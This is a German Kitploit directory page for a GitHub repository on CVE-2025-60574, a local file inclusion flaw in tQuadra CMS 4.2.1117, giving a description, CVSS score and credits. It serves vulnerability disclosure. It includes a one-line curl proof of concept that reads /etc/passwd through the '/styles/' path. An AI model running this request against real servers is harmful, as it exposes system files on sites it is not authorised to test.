Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/jacopoaugelli/cve-2025-60574
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubjacopoaugelli/cve-2025-60574

CVE-2025-60574

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Entdecker der Schwachstellen & Exploit-Autoren

Stefano Andreatta & Jacopo Candido Augelli


CVE-2025-60574

Beschreibung der Schwachstelle

Eine Local File Inclusion (LFI)-Schwachstelle wurde in tQuadra CMS 4.2.1117 identifiziert. Das Problem besteht im Pfad "/styles/", der die vom Benutzer bereitgestellten Eingaben nicht ordnungsgemäß bereinigt. Ein Angreifer kann dies ausnutzen, indem er eine manipulierte GET-Anfrage sendet, um beliebige Dateien vom zugrunde liegenden System abzurufen.

Entdecker: Stefano Andreatta & Jacopo Candido Augelli

CVSS 3.1 - 7.5 Hoch

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Proof-of-Concept

root@kitploit:~
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip

PoC.png

Tool herunterladen